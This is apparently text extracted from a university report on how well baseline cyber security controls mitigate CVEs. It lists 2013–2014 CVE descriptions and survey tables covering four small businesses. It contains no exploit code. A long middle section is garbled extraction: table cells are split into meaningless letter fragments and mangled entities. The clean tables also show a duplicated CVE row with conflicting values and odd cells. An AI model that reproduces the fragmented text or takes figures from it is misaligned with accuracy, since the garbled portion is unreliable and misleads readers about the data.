CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."
CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
| CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE |
|---|---|---|---|---|---|---|---|
| CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall |
| CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware |
| CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management |
| CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install) |
| CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration |
| CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall |
| CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware |
| CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration - no JS |
| CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install) |
| CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install) |
| CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration |
| CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install) |
| CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration |
| CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration |
| CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration |
| CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration |
| CVE-2013-5757 | n | n | n | n | m | Not Mitigated | Mitigated - Firewall |
| CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE |
|---|---|---|---|---|---|---|---|
| CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion) |
| CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install) |
| CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server) |
| CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management |
| CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration |
| CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management |
| CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management |
| CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management |
| CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS |
| CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL |
| CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL |
| CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management |
| CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware |
| CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management |
| CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting) |
| CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management |
| CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware |
| CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control |
| CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control |
| CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control |
| CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing) |
| CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting |
| CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting |
| CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control |
| CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management |
| CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management |
| CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management |
| CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware |
| CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management |
| CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE |
|---|---|---|---|---|---|---|---|
| CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management |
| CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management |
| CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management |
| CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall |
| CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti DOS |
| CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting |
| CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access) |
| CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS |
| CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management |
| CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall Anti DOS, Patch Management |
| CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS, Firmware Updates |
| CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management |
| CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware |
| CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE |
|---|---|---|---|---|---|---|---|
| CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware |
| CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration |
| CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6369 | y | n | y | y | | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
